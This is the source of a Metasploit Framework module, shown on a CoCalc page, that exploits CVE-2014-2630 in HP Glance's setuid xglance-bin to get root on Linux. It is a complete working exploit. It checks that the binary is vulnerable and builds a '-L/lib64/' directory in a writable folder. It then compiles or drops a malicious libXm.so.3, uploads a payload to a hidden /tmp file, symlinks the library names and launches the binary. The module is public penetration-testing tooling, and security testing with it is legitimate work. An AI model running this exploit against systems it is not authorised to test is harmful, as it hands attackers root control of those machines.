CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/hp_xglance_priv_esc.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = GreatRanking

8


9
  include Msf::Post::Linux::Priv

10
  include Msf::Post::Linux::System

11
  include Msf::Post::Linux::Compile

12
  include Msf::Post::File

13
  include Msf::Exploit::EXE

14
  include Msf::Exploit::FileDropper

15
  prepend Msf::Exploit::Remote::AutoCheck

16


17
  def initialize(info = {})

18
    super(

19
      update_info(

20
        info,

21
        'Name' => 'HP Performance Monitoring xglance Priv Esc',

22
        'Description' => %q{

23
          This exploit takes advantage of xglance-bin, part of

24
          HP's Glance (or Performance Monitoring) version 11 'and subsequent'

25
          , which was compiled with an insecure RPATH option.  The RPATH includes

26
          a relative path to -L/lib64/ which can be controlled by a user.

27
          Creating libraries in this location will result in an

28
          escalation of privileges to root.

29
        },

30
        'License' => MSF_LICENSE,

31
        'Author' => [

32
          'h00die', # msf module

33
          'Tim Brown', # original finding

34
          'Robert Jaroszuk', # exploit

35
          'Marco Ortisi', # exploit

36
        ],

37
        'Platform' => [ 'linux' ],

38
        'Arch' => [ ARCH_X86, ARCH_X64 ],

39
        'SessionTypes' => [ 'shell', 'meterpreter' ],

40
        'Targets' => [

41
          [ 'Automatic', {} ],

42
          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],

43
          [ 'Linux x64', { 'Arch' => ARCH_X64 } ]

44
        ],

45
        'Privileged' => true,

46
        'References' => [

47
          [ 'EDB', '48000' ],

48
          [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding

49
          [ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit

50
          [ 'URL', 'https://github.com/redtimmy/perf-exploiter' ],

51
          [ 'PACKETSTORM', '156206' ],

52
          [ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ],

53
          [ 'CVE', '2014-2630' ]

54
        ],

55
        'DisclosureDate' => '2014-11-19',

56
        'DefaultTarget' => 0,

57
        'Notes' => {

58
          'Stability' => [CRASH_SAFE],

59
          'Reliability' => [REPEATABLE_SESSION],

60
          'SideEffects' => [ARTIFACTS_ON_DISK]

61
        }

62
      )

63
    )

64
    register_options [

65
      OptString.new('GLANCE_PATH', [ true, 'Path to xglance-bin', '/opt/perf/bin/xglance-bin' ])

66
    ]

67
    register_advanced_options [

68
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])

69
    ]

70
  end

71


72
  # Simplify pulling the writable directory variable

73
  def base_dir

74
    datastore['WritableDir'].to_s

75
  end

76


77
  def exploit_folder

78
    "#{base_dir}/-L/lib64/"

79
  end

80


81
  def glance_path

82
    datastore['GLANCE_PATH'].to_s

83
  end

84


85
  # Pull the exploit binary or file (.c typically) from our system

86
  def exploit_data(file)

87
    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file)

88
  end

89


90
  def find_libs

91
    libs = cmd_exec "ldd #{glance_path} | grep libX"

92
    %r{(?<lib>libX.+\.so\.\d) => -L/lib64} =~ libs

93
    return nil if lib.nil?

94


95
    lib

96
  end

97


98
  def check

99
    return CheckCode::Safe("#{glance_path} file not found") unless file? glance_path

100
    return CheckCode::Safe("#{glance_path} is not setuid") unless setuid? glance_path

101


102
    lib = find_libs

103
    if lib.nil?

104
      vprint_error 'Patched xglance-bin, not linked to -L/lib64/'

105
      return CheckCode::Safe

106
    end

107
    vprint_good "xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}"

108
    CheckCode::Appears

109
  end

110


111
  def exploit

112
    if !datastore['ForceExploit'] && is_root?

113
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')

114
    end

115


116
    unless writable? base_dir

117
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

118
    end

119


120
    # delete exploit folder in case a previous attempt failed

121
    vprint_status("Deleting exploit folder: #{base_dir}/-L")

122
    rm_cmd = "rm -rf \"#{base_dir}/-L\""

123
    cmd_exec(rm_cmd)

124
    # make folder

125
    vprint_status("Creating exploit folder: #{exploit_folder}")

126
    cmd_exec "mkdir -p #{exploit_folder}"

127
    register_dir_for_cleanup "#{base_dir}/-L"

128


129
    # drop our .so on the system that calls our payload

130
    # we need gcc to compile instead of metasm since metasm

131
    # removes unused variables, which we need to keep xglance-bin

132
    # from breaking and not launching our exploit

133
    so_file = "#{exploit_folder}libXm.so.3"

134
    if live_compile?

135
      vprint_status 'Live compiling exploit on system...'

136
      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"

137
      code = exploit_data('CVE-2014-2630.c')

138
      code.sub!(payload_path.to_s, payload_path) # inject our payload path

139
      upload_and_compile so_file, code, '-fPIC -shared -static-libgcc'

140
      rm_f "#{so_file}.c"

141
    else

142
      payload_path = '/tmp/.u4aLoiq'

143
      vprint_status 'Dropping pre-compiled exploit on system...'

144
      upload_and_chmodx so_file, exploit_data('libXm.so.3')

145
    end

146


147
    # Upload payload executable

148
    vprint_status 'uploading payload'

149
    upload_and_chmodx payload_path, generate_payload_exe

150


151
    # link so files to exploit vuln

152
    lib = find_libs

153
    # just to be safe, Xt and Xp were in the original exploit

154
    # our mock binary is also exploitsable through libXmu.so.6

155
    # unsure about the real binary

156
    cd exploit_folder

157
    ['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l|

158
      cmd_exec "ln -s libXm.so.3 #{l}"

159
    end

160


161
    # Launch exploit

162
    print_status 'Launching xglance-bin...'

163
    cd base_dir

164
    output = cmd_exec glance_path

165
    output.each_line { |line| vprint_status line.chomp }

166
    print_warning("Manual cleanup of #{exploit_folder} may be required")

167
  end

168
end

169


170